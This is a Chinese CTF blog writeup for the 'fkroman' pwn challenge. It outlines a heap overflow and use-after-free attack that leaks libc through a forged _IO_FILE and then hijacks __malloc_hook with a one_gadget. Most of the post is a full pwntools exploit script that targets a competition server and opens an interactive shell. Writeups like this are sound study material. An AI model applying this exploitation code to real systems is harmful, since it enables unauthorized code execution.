文章
89
标签
15
分类
16
首页
文章
标签
分类
学习资源
关于
友情链接
(o≖◡≖)
目录
  1. 1. 思路
  2. 2. exp
数字经济 pwn fkroman writeup
|pwn
字数总计: 499|阅读时长: 3 分钟|阅读量:

思路

  • 利用堆溢出伪造堆块,并用uaf漏洞打_IO_FILE泄露出libc地址
  • 再用uaf漏洞劫持malloc_hook为one_gadget

exp

本地环境:ubuntu 16.04,成功率不高

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
#!/usr/bin/env python2

from pwn import *
context(log_level='debug', arch='amd64', os='linux')

exe = './fkroman'
lib = './libc-2.23.so'
ip = '121.40.246.48'
port = 9999
elf = ELF(exe)
libc = ELF(lib)


def dbg(script=''):
    attach(io, gdbscript=script)

def choice(idx):
    io.sendlineafter('Your choice: ', str(idx))

def index(idx):
    io.sendlineafter('Index: ', str(idx))

def add(idx, size):
    choice(1)
    index(idx)
    io.sendlineafter('Size: ', str(size))

def dele(idx):
    choice(3)
    index(idx)

def edit(idx, size, content):
    choice(4)
    index(idx)
    io.sendlineafter('Size: ', str(size))
    io.sendafter('Content: ', content)

# ------------------------------------------------
LOCAL = 1
iofile_off = [0x25dd,0xf5eb] #_IO_2_1_stderr_+157
libc_off = 0x7ffff7dd2600-0x7ffff7a0d000
onegadgets = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
# ------------------------------------------------


def exp():
    add(0, 0x70-8) #0
    add(1, 0x70-8) #1
    add(2, 0x90-8) #2
    add(3, 0x20-8) #3
#-------------------leak libc---------------------
    dele(1)
    dele(0)
    dele(2)
    edit(0, 1, p8(0xe0))
    edit(1, 0x70, 'A'*0x68+p64(0x71))
    edit(2, 2, p16(iofile_off[0]))
    #gdb.attach(io)
    add(4, 0x70-8) #0
    #gdb.attach(io)
    add(5, 0x70-8) #2
    #gdb.attach(io)
    add(6, 0x70-8) #target
    #gdb.attach(io)
    edit(6, 0x54, 'A'*3+p64(0)*6+p64(0x00000000fbad1800)+p64(0)*3+"\x00")
    #gdb.attach(io)
    io.recv(0x40)
    recv_addr=u64(io.recv(8))
    log.info('libc->'+hex(recv_addr))
    pause()
    libc.address = recv_addr - libc_off
    log.info(hex(libc.address))

#-------------------malloc_hook-------------------
    add(7, 0x70-8) #2
    edit(7, 0x70, 'B'*0x68+p64(0x21))
    dele(7)
    info(hex(libc.sym['__malloc_hook']-0x23))
    pause()
    edit(7, 8, p64(libc.sym['__malloc_hook']-0x23)) #0x7fefcf441aed _IO_wide_data_0+301
    gdb.attach(io)
    add(8, 0x70-8) #2
    add(9, 0x70-8) #target2
    gdb.attach(io)
    info(hex(libc.address+onegadgets[1]))
    pause()
    edit(9, 0x1b, 'C'*0x13+p64(libc.address+onegadgets[1])) #0x7fefcf0c226a
    #gdb.attach(io)
    add(10, 0)
    io.interactive()


# ------------------------------------------------
if __name__ == '__main__':

    for i in range(100):
        try:
            if LOCAL:
                io = elf.process()
                env={"LD_PRELOAD": libc.path}
            else:
                io = remote(ip, port)
            exp()
        except:
            print i

参考文章:
https://mp.weixin.qq.com/s/Q4A6LwCd2E29uSXjMJs1dg
https://firmianay.gitbooks.io/ctf-all-in-one/doc/4.13_io_file.html

文章作者: nocbtm
文章链接: https://nocbtm.github.io/2019/09/28/数字经济 pwn fkroman writeup/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 nocbtm's Blog
pwn
打赏
  • 微信
  • 支付宝
相关推荐
数字经济 pwn amazon writeup
2019 RoarCTF pwn writeup
2019 xman writeup
2020 i春秋公益赛pwn writeup
360杯 pwn writeup
SROP